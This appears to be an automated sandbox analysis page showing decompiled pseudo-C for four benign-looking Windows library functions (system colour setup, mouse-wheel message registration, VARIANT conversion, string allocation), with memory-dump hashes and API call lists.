Source File: 00000000.00000002.199522288.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.199518187.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199590313.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199602330.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.199607316.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199611044.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199614967.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199635499.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalLeaveSection$Exception@8Throw$AllocExceptionLocalRaiseValue_memset
String ID:
API String ID: 356813703-0
Opcode ID: dbae14b3f866a3b207fbe93afc0cae5805417e8936c727a290b49233841e7172
Instruction ID: 715a94e063451aa5ad8dddd1738d3b02fe6788d279cb7c5db036e0dbf80938a1
Opcode Fuzzy Hash: dbae14b3f866a3b207fbe93afc0cae5805417e8936c727a290b49233841e7172
Instruction Fuzzy Hash: 83117C70A00605BFDB10AF65EC85D6BBBB5EF44318750C52AF40696661CB34AC90CB68

Uniqueness

Uniqueness Score: -1.00%

Function 00420890, Relevance: 10.5, APIs: 7, Instructions: 29
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00420890(void* __ecx) {
				struct HBRUSH__* _t14;
				void* _t18;

				_t18 = __ecx;
				 *((intOrPtr*)(_t18 + 0x28)) = GetSysColor(0xf);
				 *((intOrPtr*)(_t18 + 0x2c)) = GetSysColor(0x10);
				 *((intOrPtr*)(_t18 + 0x30)) = GetSysColor(0x14);
				 *((intOrPtr*)(_t18 + 0x34)) = GetSysColor(0x12);
				 *((intOrPtr*)(_t18 + 0x38)) = GetSysColor(6);
				 *((intOrPtr*)(_t18 + 0x24)) = GetSysColorBrush(0xf);
				_t14 = GetSysColorBrush(6);
				 *(_t18 + 0x20) = _t14;
				return _t14;
			}

0x0042089a
0x004208a0
0x004208a7
0x004208ae
0x004208b5
0x004208c2
0x004208c9
0x004208cc
0x004208cf
0x004208d3

APIs

GetSysColor.USER32(0000000F), ref: 0042089C
GetSysColor.USER32(00000010), ref: 004208A3
GetSysColor.USER32(00000014), ref: 004208AA
GetSysColor.USER32(00000012), ref: 004208B1
GetSysColor.USER32(00000006), ref: 004208B8
GetSysColorBrush.USER32(0000000F), ref: 004208C5
GetSysColorBrush.USER32(00000006), ref: 004208CC

Memory Dump Source

Source File: 00000000.00000002.199522288.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.199518187.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199590313.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199602330.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.199607316.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199611044.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199614967.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199635499.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: Color$Brush
String ID:
API String ID: 2798902688-0
Opcode ID: ddbef7d75fa9f72a11f9b6b5891b1d48bc5cbd90a84d0dcb73dff7d5adca9a9c
Instruction ID: 7261c17fb2df2ad4b797cb1e79a7fe258a1ec981dd2b06d9b767f77debf0a3b6
Opcode Fuzzy Hash: ddbef7d75fa9f72a11f9b6b5891b1d48bc5cbd90a84d0dcb73dff7d5adca9a9c
Instruction Fuzzy Hash: CFF0F871D407489BD730BF729D09B47BAE5EFC4B10F02192EE2818BA90E6B6E4409F44

Uniqueness

Uniqueness Score: -1.00%

Function 0043BEBD, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 24
registryclipboardCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0043BEBD() {
				long _t5;
				int _t6;

				if((0x80000000 & GetVersion()) == 0 || GetVersion() != 4) {
					_t5 = GetVersion();
					if((0x80000000 & _t5) != 0) {
						L5:
						 *0x452a54 =  *0x452a54 & 0x00000000;
						return _t5;
					}
					_t5 = GetVersion();
					if(_t5 != 3) {
						goto L5;
					}
					goto L4;
				} else {
					L4:
					_t6 = RegisterClipboardFormatA("MSWHEEL_ROLLMSG");
					 *0x452a54 = _t6;
					return _t6;
				}
			}

0x0043bece
0x0043bed8
0x0043bedc
0x0043bef8
0x0043bef8
0x00000000
0x0043bef8
0x0043bede
0x0043bee4
0x00000000
0x00000000
0x00000000
0x0043bee6
0x0043bee6
0x0043beeb
0x0043bef1
0x00000000
0x0043bef1

APIs

GetVersion.KERNEL32 ref: 0043BEC5
GetVersion.KERNEL32 ref: 0043BED0
GetVersion.KERNEL32 ref: 0043BED8
GetVersion.KERNEL32 ref: 0043BEDE
RegisterClipboardFormatA.USER32 ref: 0043BEEB

Strings

MSWHEEL_ROLLMSG, xrefs: 0043BEE6

Memory Dump Source

Source File: 00000000.00000002.199522288.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.199518187.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199590313.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199602330.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.199607316.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199611044.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199614967.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199635499.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: Version$ClipboardFormatRegister
String ID: MSWHEEL_ROLLMSG
API String ID: 2888461884-2485103130
Opcode ID: 0d24befb2ae8d05da5236b3160f385d9eb081832e5951939dda6a65550d5c13d
Instruction ID: 2e0143c44d68de2814956bdc80c20222312dd3f269a57e0f17f577e5b19e0a6a
Opcode Fuzzy Hash: 0d24befb2ae8d05da5236b3160f385d9eb081832e5951939dda6a65550d5c13d
Instruction Fuzzy Hash: 78E04F7A90111386D6112B7DAE017E76B95CB9C351F1620779B0042650DB6C484B8AEE

Uniqueness

Uniqueness Score: -1.00%

Function 0041EBB5, Relevance: 9.4, APIs: 6, Instructions: 404
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E0041EBB5(void* __ebx, void* __ecx, signed short __edx, void* __edi, void* __esi, void* __eflags) {
				void* __ebp;
				signed int _t163;
				signed short _t178;
				signed int _t184;
				signed short _t185;
				intOrPtr* _t187;
				void* _t189;
				signed short _t198;
				signed short _t200;
				signed int _t203;
				signed short _t206;
				signed short _t213;
				signed short _t215;
				signed short _t224;
				long long* _t231;
				intOrPtr* _t235;
				void* _t237;
				void* _t243;
				void* _t246;
				intOrPtr* _t248;
				void* _t254;
				void* _t257;
				signed int _t260;
				signed short _t261;
				signed short _t262;
				signed short _t266;
				signed short _t270;
				intOrPtr* _t271;
				void* _t281;
				signed short _t295;
				void* _t339;
				void* _t340;
				signed short _t342;
				void* _t343;
				intOrPtr* _t344;
				signed int _t345;
				void* _t347;
				signed long long _t357;

				_t337 = __edx;
				_t282 = __ecx;
				_t345 = _t347 - 0x64;
				_t163 =  *0x44f5d0; // 0x765b253d
				 *(_t345 + 0x68) = _t163 ^ _t345;
				_push(0xcc);
				E004271DA(E0043B0DB, __ebx, __edi, __esi);
				 *((intOrPtr*)(_t345 + 0x4c)) =  *((intOrPtr*)(_t345 + 0x74));
				_t339 = __ecx;
				 *(_t345 + 0x30) = 0;
				if((0 |  *((intOrPtr*)(__ecx + 0x48)) != 0x00000000) == 0) {
					L1:
					E00415838(_t282);
				}
				if((0 |  *((intOrPtr*)(_t339 + 0x54)) != 0x00000000) == 0) {
					goto L1;
				}
				E00422542(_t345 + 0x3c);
				_t342 = 3;
				 *((intOrPtr*)(_t345 - 4)) = 0;
				 *(_t345 + 0x50) = _t342;
				E0041C6DB(0,  *((intOrPtr*)(_t339 + 0x54)), _t345,  *((intOrPtr*)(_t345 + 0x78)), _t345 + 0x50);
				if( *(_t345 + 0x50) != _t342) {
					_t178 = E0041A795(_t339, __eflags,  *((intOrPtr*)(_t345 + 0x78)), _t345 + 0x50);
					__eflags = _t178;
					if(_t178 == 0) {
						goto L4;
					} else {
						_t184 =  *(_t345 + 0x50) & 0x0000ffff;
						_t344 = __imp__#9;
						__eflags = _t184 - 0x81;
						if(__eflags > 0) {
							_t185 = _t184 - 0x82;
							__eflags = _t185;
							if(__eflags == 0) {
								goto L50;
							} else {
								_t198 = _t185 - 1;
								__eflags = _t198;
								if(__eflags == 0) {
									_t200 = E0041C3FE(_t339, __eflags,  *((intOrPtr*)(_t345 + 0x78)), _t345 + 0x54);
									__eflags = _t200;
									if(_t200 != 0) {
										__eflags =  *(_t345 + 0x55);
										asm("fild qword [ebp+0x57]");
										if( *(_t345 + 0x55) > 0) {
											do {
												_t139 = _t345 + 0x55;
												 *_t139 =  *(_t345 + 0x55) - 1;
												__eflags =  *_t139;
												_t357 = _t357 /  *0x43f6c0;
											} while ( *_t139 != 0);
										}
										__eflags =  *(_t345 + 0x56);
										if( *(_t345 + 0x56) == 0) {
											asm("fchs");
										}
										 *(_t345 - 0x14) = _t357;
										 *(_t345 - 0x1c) = 5;
										 *((char*)(_t345 - 4)) = 0xe;
										E00422522(_t345 - 0x1c, _t345 + 0x3c, _t345 - 0x1c);
										_t203 = _t345 - 0x1c;
										goto L30;
									}
								} else {
									_t206 = _t198;
									__eflags = _t206;
									if(__eflags == 0) {
										__eflags = E0041C428(_t339, _t344, __eflags,  *((intOrPtr*)(_t345 + 0x78)), _t345 + 0x34);
										if(__eflags != 0) {
											asm("fldz");
											 *(_t345 + 0x58) = _t357;
											_t337 =  *(_t345 + 0x34);
											 *((intOrPtr*)(_t345 + 0x60)) = 0;
											E0041A634(_t345 + 0x58, _t339, __eflags,  *(_t345 + 0x34),  *(_t345 + 0x36) & 0x0000ffff,  *(_t345 + 0x38) & 0x0000ffff, 0, 0, 0);
											 *_t345 = 7;
											 *(_t345 + 8) =  *(_t345 + 0x58);
											 *((char*)(_t345 - 4)) = 0xf;
											E00422522(_t345, _t345 + 0x3c, _t345);
											_t203 = _t345;
											goto L30;
										}
									} else {
										_t213 = _t206 - 1;
										__eflags = _t213;
										if(__eflags == 0) {
											_t215 = E0041C428(_t339, _t344, __eflags,  *((intOrPtr*)(_t345 + 0x78)), _t345 + 0x34);
											__eflags = _t215;
											if(_t215 != 0) {
												asm("fldz");
												 *(_t345 + 0x58) = _t357;
												 *((intOrPtr*)(_t345 + 0x60)) = 0;
												E0041A694( *(_t345 + 0x34) & 0x0000ffff,  *(_t345 + 0x36) & 0x0000ffff,  *(_t345 + 0x38) & 0x0000ffff);
												 *(_t345 - 0x4c) = 7;
												 *(_t345 - 0x44) =  *(_t345 + 0x58);
												 *((char*)(_t345 - 4)) = 0x10;
												E00422522(_t345 - 0x4c, _t345 + 0x3c, _t345 - 0x4c);
												_t203 = _t345 - 0x4c;
												goto L30;
											}
										} else {
											__eflags = _t213 - 1;
											if(__eflags == 0) {
												_t224 = E0041C45D(_t339, _t344, __eflags,  *((intOrPtr*)(_t345 + 0x78)), _t345 + 0x54);
												__eflags = _t224;
												if(_t224 != 0) {
													_t231 = E0041C62B(_t345 - 0xd8,  *((short*)(_t345 + 0x54)),  *(_t345 + 0x56) & 0x0000ffff,  *(_t345 + 0x58) & 0x0000ffff,  *(_t345 + 0x5a) & 0x0000ffff,  *(_t345 + 0x5c) & 0x0000ffff,  *(_t345 + 0x5e) & 0x0000ffff);
													 *(_t345 - 0x3c) = 7;
													 *((long long*)(_t345 - 0x34)) =  *_t231;
													 *((char*)(_t345 - 4)) = 0x11;
													E00422522(_t345 - 0x3c, _t345 + 0x3c, _t345 - 0x3c);
													_t203 = _t345 - 0x3c;
													goto L30;
												}
											}
										}
									}
								}
							}
						} else {
							if(__eflags == 0) {
								_t235 = E00401EE0(0, _t345, E0041A7C6(_t339, __eflags,  *((intOrPtr*)(_t345 + 0x78))));
								 *((char*)(_t345 - 4)) = 2;
								_t237 = E004227DC(0, _t345 - 0xbc, _t339, _t344, __eflags);
								 *((char*)(_t345 - 4)) = 3;
								E00422522(_t237, _t345 + 0x3c, _t237);
								 *_t344(_t345 - 0xbc,  *_t235, 8);
								_t295 =  *(_t345 + 0x50);
								goto L51;
							} else {
								__eflags = _t184 - 8;
								if(__eflags > 0) {
									__eflags = _t184 - 0xb;
									if(__eflags == 0) {
										_t243 = E0042246B(_t345 - 0x9c,  *(E0041A7C6(_t339, __eflags,  *((intOrPtr*)(_t345 + 0x78)))) & 0x0000ffff, 0xb);
										 *((char*)(_t345 - 4)) = 0xb;
										E00422522(_t243, _t345 + 0x3c, _t243);
										_t203 = _t345 - 0x9c;
										goto L30;
									} else {
										__eflags = _t184 - 0xc;
										if(__eflags == 0) {
											_t246 = E004226E0(0, _t345 - 0x8c, _t339, E0041A7C6(_t339, __eflags,  *((intOrPtr*)(_t345 + 0x78))));
											 *((char*)(_t345 - 4)) = 1;
											E00422522(_t246, _t345 + 0x3c, _t246);
											_t203 = _t345 - 0x8c;
											goto L30;
										} else {
											__eflags = _t184 - 0xf;
											if(_t184 > 0xf) {
												__eflags = _t184 - 0x11;
												if(__eflags <= 0) {
													_t248 = E0041A7C6(_t339, __eflags,  *((intOrPtr*)(_t345 + 0x78)));
													 *(_t345 - 0x5c) = 0x11;
													 *((char*)(_t345 - 0x54)) =  *_t248;
													 *((char*)(_t345 - 4)) = 6;
													E00422522(_t345 - 0x5c, _t345 + 0x3c, _t345 - 0x5c);
													_t203 = _t345 - 0x5c;
													goto L30;
												} else {
													__eflags = _t184 - 0x12;
													if(__eflags == 0) {
														goto L27;
													} else {
														__eflags = _t184 - 0x13;
														if(__eflags == 0) {
															goto L26;
														}
													}
												}
											}
										}
									}
								} else {
									if(__eflags == 0) {
										L50:
										_t187 = E004155EA(0, _t345 + 0x30, _t339, _t344, __eflags);
										 *((char*)(_t345 - 4)) = 4;
										_t189 = E004227DC(0, _t345 - 0xcc, _t339, _t344, __eflags);
										 *((char*)(_t345 - 4)) = 5;
										E00422522(_t189, _t345 + 0x3c, _t189);
										 *_t344(_t345 - 0xcc,  *_t187, 8, E0041A7C6(_t339, __eflags,  *((intOrPtr*)(_t345 + 0x78))));
										_t295 =  *(_t345 + 0x30);
										L51:
										__eflags = _t295 + 0xfffffff0;
										 *((char*)(_t345 - 4)) = 0;
										E00401E60(_t295 + 0xfffffff0, _t337);
									} else {
										_t260 = _t184;
										__eflags = _t260;
										if(__eflags == 0) {
											L27:
											_t254 = E0042246B(_t345 - 0xac,  *(E0041A7C6(_t339, __eflags,  *((intOrPtr*)(_t345 + 0x78)))) & 0x0000ffff, 2);
											 *((char*)(_t345 - 4)) = 7;
											E00422522(_t254, _t345 + 0x3c, _t254);
											_t203 = _t345 - 0xac;
											goto L30;
										} else {
											_t261 = _t260 - 1;
											__eflags = _t261;
											if(__eflags == 0) {
												L26:
												_t257 = E00422492(_t345 - 0x7c,  *(E0041A7C6(_t339, __eflags,  *((intOrPtr*)(_t345 + 0x78)))), 3);
												 *((char*)(_t345 - 4)) = 8;
												E00422522(_t257, _t345 + 0x3c, _t257);
												_t203 = _t345 - 0x7c;
												goto L30;
											} else {
												_t262 = _t261 - 1;
												__eflags = _t262;
												if(__eflags == 0) {
													 *(_t345 + 0x50) =  *(E0041A7C6(_t339, __eflags,  *((intOrPtr*)(_t345 + 0x78))));
													 *(_t345 + 0x10) = 4;
													 *(_t345 + 0x18) =  *(_t345 + 0x50);
													 *((char*)(_t345 - 4)) = 9;
													E00422522(_t345 + 0x10, _t345 + 0x3c, _t345 + 0x10);
													_t203 = _t345 + 0x10;
													goto L30;
												} else {
													_t266 = _t262 - 1;
													__eflags = _t266;
													if(__eflags == 0) {
														 *(_t345 - 0x24) =  *(E0041A7C6(_t339, __eflags,  *((intOrPtr*)(_t345 + 0x78))));
														 *(_t345 - 0x2c) = 5;
														 *((char*)(_t345 - 4)) = 0xa;
														E00422522(_t345 - 0x2c, _t345 + 0x3c, _t345 - 0x2c);
														_t203 = _t345 - 0x2c;
														goto L30;
													} else {
														_t270 = _t266 - 1;
														__eflags = _t270;
														if(__eflags == 0) {
															_t271 = E0041A7C6(_t339, __eflags,  *((intOrPtr*)(_t345 + 0x78)));
															 *(_t345 + 0x20) = 6;
															 *((intOrPtr*)(_t345 + 0x28)) =  *_t271;
															 *((intOrPtr*)(_t345 + 0x2c)) =  *((intOrPtr*)(_t271 + 4));
															 *((char*)(_t345 - 4)) = 0xd;
															E00422522(_t345 + 0x20, _t345 + 0x3c, _t345 + 0x20);
															_t203 = _t345 + 0x20;
															goto L30;
														} else {
															__eflags = _t270 - 1;
															if(__eflags == 0) {
																 *(_t345 - 0x64) =  *(E0041A7C6(_t339, __eflags,  *((intOrPtr*)(_t345 + 0x78))));
																 *(_t345 - 0x6c) = 7;
																 *((char*)(_t345 - 4)) = 0xc;
																E00422522(_t345 - 0x6c, _t345 + 0x3c, _t345 - 0x6c);
																_t203 = _t345 - 0x6c;
																L30:
																 *((char*)(_t345 - 4)) = 0;
																 *_t344(_t203);
															}
														}
													}
												}
											}
										}
									}
								}
							}
						}
						E004226E0(0,  *((intOrPtr*)(_t345 + 0x4c)), _t339, _t345 + 0x3c);
						 *_t344(_t345 + 0x3c);
					}
				} else {
					L4:
					E004226E0(0,  *((intOrPtr*)(_t345 + 0x4c)), _t339, _t345 + 0x3c);
					__imp__#9(_t345 + 0x3c);
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t345 - 0xc));
				_pop(_t340);
				_pop(_t343);
				_pop(_t281);
				return E0042569C( *((intOrPtr*)(_t345 + 0x4c)), _t281,  *(_t345 + 0x68) ^ _t345, _t337, _t340, _t343);
			}

0x0041ebb5
0x0041ebb5
0x0041ebb9
0x0041ebbd
0x0041ebc4
0x0041ebc7
0x0041ebd1
0x0041ebdb
0x0041ebe0
0x0041ebe2
0x0041ebed
0x0041ebef
0x0041ebef
0x0041ebef
0x0041ebfe
0x00000000
0x00000000
0x0041ec04
0x0041ec0e
0x0041ec16
0x0041ec19
0x0041ec1c
0x0041ec24
0x0041ec4d
0x0041ec52
0x0041ec54
0x00000000
0x0041ec56
0x0041ec56
0x0041ec5a
0x0041ec65
0x0041ec67
0x0041eec1
0x0041eec1
0x0041eec6
0x00000000
0x0041eecc
0x0041eecc
0x0041eecc
0x0041eecd
0x0041f005
0x0041f00a
0x0041f00c
0x0041f012
0x0041f015
0x0041f018
0x0041f01a
0x0041f01a
0x0041f01a
0x0041f01a
0x0041f01d
0x0041f01d
0x0041f01a
0x0041f025
0x0041f028
0x0041f02a
0x0041f02a
0x0041f02c
0x0041f02f
0x0041f03c
0x0041f040
0x0041f045
0x00000000
0x0041f045
0x0041eed3
0x0041eed4
0x0041eed4
0x0041eed5
0x0041efae
0x0041efb0
0x0041efba
0x0041efc0
0x0041efc3
0x0041efd0
0x0041efd3
0x0041efd8
0x0041efe1
0x0041efeb
0x0041efef
0x0041eff4
0x00000000
0x0041eff4
0x0041eedb
0x0041eedb
0x0041eedb
0x0041eedc
0x0041ef50
0x0041ef55
0x0041ef57
0x0041ef61
0x0041ef64
0x0041ef74
0x0041ef77
0x0041ef7c
0x0041ef85
0x0041ef8f
0x0041ef93
0x0041ef98
0x00000000
0x0041ef98
0x0041eede
0x0041eede
0x0041eedf
0x0041eeee
0x0041eef3
0x0041eef5
0x0041ef1f
0x0041ef24
0x0041ef2c
0x0041ef36
0x0041ef3a
0x0041ef3f
0x00000000
0x0041ef3f
0x0041eef5
0x0041eedf
0x0041eedc
0x0041eed5
0x0041eecd
0x0041ec6d
0x0041ec6d
0x0041ee8a
0x0041ee9a
0x0041ee9e
0x0041eea7
0x0041eeab
0x0041eeb7
0x0041eeb9
0x00000000
0x0041ec73
0x0041ec73
0x0041ec76
0x0041ed65
0x0041ed68
0x0041ee62
0x0041ee6b
0x0041ee6f
0x0041ee74
0x00000000
0x0041ed6e
0x0041ed6e
0x0041ed71
0x0041ee29
0x0041ee32
0x0041ee36
0x0041ee3b
0x00000000
0x0041ed77
0x0041ed77
0x0041ed7a
0x0041ed80
0x0041ed83
0x0041edf3
0x0041edfa
0x0041ee00
0x0041ee0a
0x0041ee0e
0x0041ee13
0x00000000
0x0041ed85
0x0041ed85
0x0041ed88
0x00000000
0x0041ed8a
0x0041ed8a
0x0041ed8d
0x00000000
0x00000000
0x0041ed8d
0x0041ed88
0x0041ed83
0x0041ed7a
0x0041ed71
0x0041ec7c
0x0041ec7c
0x0041f04d
0x0041f05b
0x0041f06b
0x0041f06f
0x0041f078
0x0041f07c
0x0041f088
0x0041f08a
0x0041f08d
0x0041f08d
0x0041f090
0x0041f093
0x0041ec82
0x0041ec83
0x0041ec83
0x0041ec84
0x0041edbe
0x0041edd4
0x0041eddd
0x0041ede1
0x0041ede6
0x00000000
0x0041ec8a
0x0041ec8a
0x0041ec8a
0x0041ec8b
0x0041ed93
0x0041eda4
0x0041edad
0x0041edb1
0x0041edb6
0x00000000
0x0041ec91
0x0041ec91
0x0041ec91
0x0041ec92
0x0041ed3e
0x0041ed41
0x0041ed4a
0x0041ed54
0x0041ed58
0x0041ed5d
0x00000000
0x0041ec98
0x0041ec98
0x0041ec98
0x0041ec99
0x0041ed11
0x0041ed14
0x0041ed21
0x0041ed25
0x0041ed2a
0x00000000
0x0041ec9b
0x0041ec9b
0x0041ec9b
0x0041ec9c
0x0041ecd7
0x0041ece1
0x0041ece7
0x0041ecea
0x0041ecf4
0x0041ecf8
0x0041ecfd
0x00000000
0x0041ec9e
0x0041ec9e
0x0041ec9f
0x0041ecb1
0x0041ecb4
0x0041ecc1
0x0041ecc5
0x0041ecca
0x0041ee41
0x0041ee42
0x0041ee45
0x0041ee45
0x0041ec9f
0x0041ec9c
0x0041ec99
0x0041ec92
0x0041ec8b
0x0041ec84
0x0041ec7c
0x0041ec76
0x0041ec6d
0x0041f09f
0x0041f0a8
0x0041f0a8
0x0041ec26
0x0041ec26
0x0041ec2d
0x0041ec36
0x0041ec36
0x0041f0b0
0x0041f0b8
0x0041f0b9
0x0041f0ba
0x0041f0c9

APIs

__EH_prolog3.LIBCMT ref: 0041EBD1
VariantClear.OLEAUT32(?), ref: 0041EC36

Part of subcall function 00415838: __CxxThrowException@8.LIBCMT ref: 0041584C

VariantClear.OLEAUT32(?), ref: 0041EE45
VariantClear.OLEAUT32(?), ref: 0041EEB7
VariantClear.OLEAUT32(?), ref: 0041F0A8

Part of subcall function 00422522: VariantCopy.OLEAUT32(?,?), ref: 00422530

Part of subcall function 004227DC: __EH_prolog3.LIBCMT ref: 004227E6
Part of subcall function 004227DC: lstrlenA.KERNEL32(?,00000224,0041F074,?,00000008,00000000,?,000000CC), ref: 00422805
Part of subcall function 004227DC: SysAllocStringByteLen.OLEAUT32(?,00000000), ref: 0042280D

Memory Dump Source

Source File: 00000000.00000002.199522288.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.199518187.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199590313.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199602330.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.199607316.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199611044.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199614967.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199635499.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: Variant$Clear$H_prolog3$AllocByteCopyException@8StringThrowlstrlen
String ID:
API String ID: 1791476184-0
Opcode ID: 6f531d27ff53acd8f02cfb2516c0923a91e79e3ce4c3643383baee003c901264
Instruction ID: 5581f08e52af421ef9c8ee28c0fdc7925d332395fb2106e801205c28927e399c
Opcode Fuzzy Hash: 6f531d27ff53acd8f02cfb2516c0923a91e79e3ce4c3643383baee003c901264
Instruction Fuzzy Hash: BCF1813450014CEADF15EFA1C8909FE7BB9AF08304F44815BFC5293291DB78DA89DB69

Uniqueness

Uniqueness Score: -1.00%

Function 004234F0, Relevance: 9.1, APIs: 6, Instructions: 118
memoryCOMMON

Download Yara Rule

C-Code - Quality: 41%

			E004234F0(void* __edx, void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t42;
				void* _t46;
				void* _t47;
				void* _t52;
				intOrPtr _t66;
				intOrPtr _t74;
				void* _t76;
				void* _t96;
				void* _t97;
				intOrPtr* _t98;
				void* _t99;
				short* _t101;
				void* _t102;
				signed int _t103;
				void* _t105;

				_t96 = __edx;
				_t103 = _t105 - 0x8c;
				_t42 =  *0x44f5d0; // 0x765b253d
				 *(_t103 + 0x88) = _t42 ^ _t103;
				_t74 =  *((intOrPtr*)(_t103 + 0x98));
				_t101 =  *((intOrPtr*)(_t103 + 0x94));
				_push(_t97);
				E004277B0(_t97, _t101, 0, 0x20);
				 *((intOrPtr*)(_t103 - 0x80)) = _t103 - 0x78;
				_t46 = E00416D15(_t74, 0x43fb18);
				_t98 = __imp__#2;
				if(_t46 == 0) {
					_t47 = E00416D15(_t74, 0x43eed0);
					__eflags = _t47;
					_push(0x100);
					_push(_t103 - 0x78);
					if(_t47 == 0) {
						_push(0xf108);
						E0040E878(_t74, _t98, _t101, _t103);
						 *_t101 = 0xf108;
					} else {
						_push(0xf10a);
						E0040E878(_t74, _t98, _t101, _t103);
						 *_t101 = 0xf10a;
					}
				} else {
					 *((intOrPtr*)(_t103 - 0x80)) =  *((intOrPtr*)(_t74 + 0xc));
					 *_t101 =  *((intOrPtr*)(_t74 + 8));
					 *((intOrPtr*)(_t101 + 0x10)) =  *((intOrPtr*)(_t74 + 0x10));
					 *((intOrPtr*)(_t101 + 0x1c)) =  *((intOrPtr*)(_t74 + 0x1c));
					_t66 =  *((intOrPtr*)(_t74 + 0x14));
					_t111 =  *((intOrPtr*)(_t66 - 0xc));
					if( *((intOrPtr*)(_t66 - 0xc)) != 0) {
						 *((intOrPtr*)(_t101 + 0xc)) =  *_t98( *((intOrPtr*)(E00415700(_t74, _t103 - 0x7c, _t98, _t101, _t111))), _t66);
						E00401E60( *((intOrPtr*)(_t103 - 0x7c)) + 0xfffffff0, _t96);
					}
					_t74 =  *((intOrPtr*)(_t74 + 0x18));
					_t113 =  *((intOrPtr*)(_t74 - 0xc));
					if( *((intOrPtr*)(_t74 - 0xc)) != 0) {
						 *((intOrPtr*)(_t101 + 4)) =  *_t98( *((intOrPtr*)(E00415700(_t74, _t103 - 0x7c, _t98, _t101, _t113))), _t74);
						E00401E60( *((intOrPtr*)(_t103 - 0x7c)) + 0xfffffff0, _t96);
					}
				}
				 *((intOrPtr*)(_t101 + 8)) =  *_t98( *((intOrPtr*)(E00415700(_t74, _t103 - 0x7c, _t98, _t101, _t113))),  *((intOrPtr*)(_t103 - 0x80)));
				_t52 = E00401E60( *((intOrPtr*)(_t103 - 0x7c)) + 0xfffffff0, _t96);
				_t114 =  *((intOrPtr*)(_t101 + 4));
				if( *((intOrPtr*)(_t101 + 4)) == 0) {
					 *((intOrPtr*)(_t101 + 4)) =  *_t98( *((intOrPtr*)(E00415700(0, _t103 - 0x7c, _t98, _t101, _t114))),  *((intOrPtr*)(E0040E67F(0, _t98, _t101, _t114) + 0x10)));
					_t52 = E00401E60( *((intOrPtr*)(_t103 - 0x7c)) + 0xfffffff0, _t96);
				}
				if( *((intOrPtr*)(_t101 + 0xc)) == 0) {
					_t117 =  *((intOrPtr*)(_t101 + 0x10));
					if( *((intOrPtr*)(_t101 + 0x10)) != 0) {
						 *((intOrPtr*)(_t101 + 0xc)) =  *_t98( *((intOrPtr*)(E00415700(0, _t103 - 0x7c, _t98, _t101, _t117))),  *((intOrPtr*)( *((intOrPtr*)(E0040E67F(0, _t98, _t101, _t117) + 4)) + 0x64)));
						_t52 = E00401E60( *((intOrPtr*)(_t103 - 0x7c)) + 0xfffffff0, _t96);
					}
				}
				_pop(_t99);
				_pop(_t102);
				_pop(_t76);
				return E0042569C(_t52, _t76,  *(_t103 + 0x88) ^ _t103, _t96, _t99, _t102);
			}

0x004234f0
0x004234f1
0x004234fe
0x00423505
0x0042350c
0x00423513
0x00423519
0x0042351f
0x00423531
0x00423534
0x0042353b
0x00423541
0x004235ad
0x004235b2
0x004235b4
0x004235bc
0x004235bd
0x004235d0
0x004235d5
0x004235da
0x004235bf
0x004235bf
0x004235c4
0x004235c9
0x004235c9
0x00423543
0x00423546
0x0042354d
0x00423553
0x00423559
0x0042355c
0x0042355f
0x00423563
0x00423578
0x0042357b
0x0042357b
0x00423580
0x00423583
0x00423587
0x0042359c
0x0042359f
0x0042359f
0x00423587
0x004235f4
0x004235f7
0x004235fe
0x00423601
0x0042361d
0x00423620
0x00423620
0x00423628
0x0042362a
0x0042362d
0x0042364c
0x0042364f
0x0042364f
0x0042362d
0x0042365a
0x0042365b
0x0042365e
0x0042366b

APIs

_memset.LIBCMT ref: 0042351F
SysAllocString.OLEAUT32(00000000), ref: 00423570
SysAllocString.OLEAUT32(00000000), ref: 00423594

Part of subcall function 00415700: __EH_prolog3.LIBCMT ref: 00415707

SysAllocString.OLEAUT32(00000000), ref: 004235EC
SysAllocString.OLEAUT32(00000000), ref: 00423615
SysAllocString.OLEAUT32(00000000), ref: 00423644

Memory Dump Source

Source File: 00000000.00000002.199522288.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.199518187.0000000000400000.00000002.00020000.sdmp Download File
